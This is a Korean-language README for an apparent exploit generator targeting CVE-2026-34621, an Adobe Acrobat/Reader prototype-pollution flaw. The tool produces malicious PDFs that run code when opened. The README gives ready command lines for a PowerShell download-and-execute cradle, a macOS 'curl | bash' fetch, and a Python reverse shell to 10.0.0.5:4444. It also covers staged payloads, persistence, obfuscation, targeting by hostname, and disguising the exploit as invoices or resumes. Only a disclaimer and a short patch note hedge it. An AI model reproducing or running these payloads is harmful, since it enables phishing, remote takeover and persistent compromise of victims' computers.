
정교한 크로스 플랫폼 익스플로잇 생성기로, **CVE-2026-34621** – Adobe Acrobat 및 Reader의 치명적인 프로토타입 오염 취약점을 대상으로 하며, Windows와 macOS에서 샌드박스 탈출 및 임의 코드 실행으로 이어집니다.
CVE-2026-34621을 위한 정교한 크로스 플랫폼 익스플로잇 생성기 – Windows 및 macOS에서 샌드박스 탈출과 임의 코드 실행으로 이어지는 Adobe Acrobat 및 Reader의 치명적인 프로토타입 오염 취약점입니다.
⚠️ 중요 고지
이 도구는 승인된 보안 연구 및 침투 테스트 용도로만 사용해야 합니다.
소유하지 않았거나 명시적인 서면 테스트 허가를 받지 않은 시스템에 대한 무단 사용은 불법입니다. 작성자는 오용에 대해 어떠한 책임도 지지 않습니다.
CVE-2026-34621은 Adobe Acrobat 및 Reader의 제로데이 취약점으로, 공격자가 다음을 수행할 수 있게 합니다:
이 생성기는 취약한 버전의 Adobe Reader에서 열릴 때 피해자의 운영 체제에 맞춰 조정된 페이로드를 자동으로 실행하는 악성 PDF 파일을 생성합니다.
지원 대상 플랫폼:
| 카테고리 | 기능 |
|---|---|
| 크로스 플랫폼 페이로드 | OS를 자동 감지하여 적절한 Windows 또는 macOS 명령 실행 방식을 선택합니다. |
| 다중 실행 벡터 | cmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS). |
| 스테이징 페이로드 | 원격 URL에서 2차 페이로드를 다운로드하여 실행합니다. |
| 지속성 | 레지스트리 Run 키(Windows) 또는 LaunchAgent(macOS)를 설치합니다. |
| 탐지 회피 기법 | 3단계 JavaScript 난독화, 환경 키잉, 실행 지연, 다형성 코드. |
| 미끼 PDF 임베딩 | 정상적인 PDF로 보이는 파일에 익스플로잇을 병합합니다(PyPDF2 필요). |
| 다중 트리거 | OpenAction, 페이지 열기 동작 또는 문서 수준 JavaScript. |
| 종합 보고서 | 페이로드 구성을 상세히 설명하는 HTML, TXT 및 JSON 보고서. |
git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit
python3 -m venv venv
source venv/bin/activate # Linux/macOS
venv\Scripts\activate # Windows
핵심 스크립트는 Python 표준 라이브러리만 사용합니다. 미끼 PDF 병합 기능을 위해 PyPDF2를 설치하세요:
pip install PyPDF2
Windows와 macOS 모두에서 계산기를 여는 기본 PDF 생성:
python3 cve_2026_34621_advanced.py -o test.pdf
생성되는 파일:
test.pdf – 악성 PDF 파일.
test_report.html – 상세 HTML 보고서.
test_report.txt – 일반 텍스트 요약.
test_config.json – JSON 구성 내보내기.
Windows 명령어
1-시나리오 명령어
A-기본 calc.exe 팝업
python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe
PowerShell 리버스 셸
python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""
지속성이 포함된 스테이징 페이로드
python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p
환경 키잉("SALES-PC"에서만 실행)
python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC
난독화 레벨 2 및 10초 지연
python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10
macOS 명령어
2-시나리오 명령어
계산기 열기
python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"
스크립트 다운로드 및 실행
python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"
Python을 통한 리버스 셸
python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
LaunchAgent를 통한 지속성
python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p
미끼 PDF에 임베딩
python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen
3-모바일 테스트 참고
스크립트 자체는 데스크톱(Windows/macOS/Linux)에서 실행되어 PDF를 생성합니다. 생성된 PDF는 Android 또는 iOS 기기에서 열 수 있지만:
모바일 버전의 Adobe Acrobat Reader는 CVE-2026-34621에 취약하지 않습니다.
페이로드는 시스템 명령을 실행하는 대신 무해한 데모 대체 기능(URL 열기 또는 알림 표시)을 트리거합니다.
옵션 설명
-o, --output FILE 필수. 출력 PDF 파일 이름.
--win CMD 실행할 Windows 명령어(기본값: calc.exe).
--mac CMD 실행할 macOS 명령어(기본값: open /System/Applications/Calculator.app).
--stage URL 2차 페이로드를 다운로드할 URL.
-p, --persistence 지속성 메커니즘 설치(레지스트리/LaunchAgent).
-O, --obfuscate LEVEL JavaScript 난독화 수준(0=없음, 1=기본, 2=중급, 3=고급).
-d, --delay SECONDS 지정된 초만큼 실행 지연.
-k, --key HOSTNAME 환경 키잉 – 일치하는 호스트 이름에서만 실행.
-l, --lure PDF 미끼로 사용할 정상 PDF 경로(익스플로잇 병합).
--trigger TYPE 트리거 벡터: openaction, pageopen 또는 doclevel.
--no-reports HTML/TXT/JSON 보고서 생성을 건너뜁니다.
--seed N 재현 가능한 다형성 생성을 위한 난수 시드 설정.
공격 체인
프로토타입 오염:
임베디드 JavaScript가 Object.prototype을 수정하여 악성 속성(__trusted, privileged 등)을 주입합니다. 이는 Adobe JavaScript 엔진의 신뢰 경계를 혼란시킵니다.
컨텍스트 승격
오염된 프로토타입으로 인해 엔진은 신뢰할 수 없는 문서 JavaScript를 권한 있는 컨텍스트에서 실행되는 것처럼 잘못 처리합니다.
권한 있는 API 접근
스크립트는 이제 app.launchURL, util.readFileIntoStream 및 app.trustedFunction과 같은 제한된 API를 호출할 수 있습니다.
샌드박스 탈출
이러한 API는 Adobe 샌드박스 외부에서 파일 시스템 접근 및 프로세스 실행을 허용합니다.
임의 코드 실행
스크립트는 OS별 방법을 사용하여 공격자의 명령을 실행합니다:
Windows: cmd.exe /c, PowerShell 또는 WScript.Shell.
macOS: Terminal.app URL 핸들러 또는 osascript.
난독화 수준
수준 설명
0 난독화 없음 – 일반 읽기 가능한 JavaScript.
1 문자열 리터럴이 String.fromCharCode로 변환되고 변수 이름이 무작위화됩니다.
2 수준 1 + 데드 코드 주입 및 정크 주석.
3 전체 스크립트가 base64로 인코딩되고 eval(atob(...))로 래핑된 후 다시 난독화됩니다.
제품 트랙 취약한 버전 패치된 버전
Adobe Acrobat DC 연속 ≤ 26.001.21367 26.001.21411
Adobe Acrobat Reader DC 연속 ≤ 26.001.21367 26.001.21411
Adobe Acrobat 2024 클래식 ≤ 24.001.30356 24.001.30362 (Win) / 24.001.30360 (macOS)
즉시 업데이트: Adobe의 최신 보안 업데이트를 적용하세요.
Adobe Reader에서 JavaScript 비활성화: 편집 → 기본 설정 → JavaScript → "Acrobat JavaScript 사용" 체크 해제(일부 PDF 기능이 중단될 수 있음).
대체 PDF 뷰어 사용: 영향을 받지 않는 브라우저 또는 타사 뷰어 사용을 고려하세요.
기여를 환영하지만 다음 사항을 유의하세요:
모든 풀 리퀘스트는 방어적 연구, 탐지 개선 또는 보고 기능 향상을 위한 것이어야 합니다.
합법적인 테스트에 필요한 범위를 넘어 도구의 공격적 기능을 증가시키는 기여는 수락하지 않습니다.
기여 방법:
저장소를 포크합니다.
기능 브랜치를 생성합니다.
변경 사항에 대한 명확한 설명과 함께 풀 리퀘스트를 제출합니다.
이 프로젝트는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.
이 소프트웨어를 사용함으로써 귀하는 모든 관련 법률 및 규정을 준수할 책임이 있음에 동의합니다.
작성자는 이 도구로 인한 오용 또는 손해에 대한 모든 책임을 부인합니다.